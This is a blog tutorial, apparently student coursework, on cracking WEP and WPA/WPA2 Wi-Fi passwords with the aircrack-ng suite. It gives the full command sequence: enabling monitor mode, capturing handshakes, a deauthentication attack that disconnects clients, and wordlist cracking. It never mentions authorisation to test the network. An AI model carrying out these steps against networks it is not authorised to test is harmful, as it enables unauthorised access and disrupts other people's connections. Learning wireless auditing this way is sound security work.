Open in app

Sign in

Write

Sign in

Cracking WEP &WPA/WPA2 Wi-Fi Passwords

Prateek Parashar
4 min readFeb 13, 2021

Wi-Fi has different security standards such as WEP, WPA, WPA2, and currently not so widely used WPA3. These security standards decide how strong is the security of the Wi-Fi and also how easily the Wi-Fi passwords will be cracked. If you notice that a Wi-Fi network has WEP security then be happy because it is for sure crackable and if its a WPA or WPA2 we need to do some extra work but it still can be cracked

This blog is written as a part of the Master Certificate in Cyber Security that I am pursuing from HackerU.

As the WPA/WPA2 attacks are going to be Brute force attacks or as it is called dictionary attacks we should also know how much time each password type takes to be cracked.

This also depends on your GPU spec (if you are using one) and resources allocated to the kali virtual machine.

We will be starting from WPA/WP2 cracking and then moving on to WEP cracking

Let's get on to cracking

Pre-requisites

  1. Kali Linux
  2. Aircrack-ng suite ( pre-installed in kali)
  3. Wi-Fi adapter (monitor mode compatible)

Process

Step 1- Enabling monitor mode

Enable monitor mode on your wireless adapter so it can monitor all the wireless traffic

Checking if the adapter is connected
Changing the mode from managed to monitor

iwconfig

airmon-ng start wlan0

WPA/WPA2

Step 2- Monitor wireless connection and capture packets

Start airodump-ng to monitor all the wireless connections and single out the target.

Selecting the WPA2 target

airodump-ng wlan0

STEP 3 -Dumping Data packets & capturing Handshake

airodump-ng wlan0 --bssid <target_mac_address> -c 1--write <filename>

Capturing data packets from the network ASUS_X00TD and writing them into a file name asus1. Here bssid means the target MAC address and C means the channel number.

Now we have to wait for a device to connect to the target so we can capture the handshake which we use to crack the password. If no new device is connecting to the target we can disconnect the existing clients on the target by performing a Deauthentication attack. Open a new terminal and write the following command for the de-auth attack.

aireplay-ng -0 1 -a <target_MAC_address>-c <client_MAC_address>wlan0

  • -0 means deauthentication
  • 1 is the number of deauths to send (you can send multiple if you wish)
Capturing the handshake

Step 4-Cracking the WPA/WPA2 password

.cap file that we are going to use

Using the wordlist rockyou.txt to perform a brute force attack and as we can see we have cracked the password i.e. is liverpool.

aircrack-ng <.cap_file> -w <wordlist_location/wordlist.txt>

If you want to create a custom wordlist you can use the CUPP tool to do so.

Mebus/cupp

The most common form of authentication is the combination of a username and a password or passphrase. If both match…

github.com

Now let's crack some WEP passwords which is like child's play.

WEP

STEP 1 is the same as WPA/WPA2 process.

STEP 2 -Dumping data packets

Finding a WEP secured Wi-FI
Dumping data packets

airodump-ng wlan0 --bssid <target_MAC_address> -c <channel> --<filename>

STEP 3 -Cracking Password

How easily we have cracked WEP password which is 6MK”q .

aircrack-ng <file.cap>

Hope you found this helpful. If you liked this article or if it helped you in any way. Please leave some claps. And I wouldn’t mind 50 of them ;)

Wifi
Wifihacking
Hacker
Cybersecurity

--

--

Prateek Parashar

Written by Prateek Parashar

43 Followers

Computer Science graduate who is passionate about CyberSecurity. An IoT and Crypto enthusiast.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams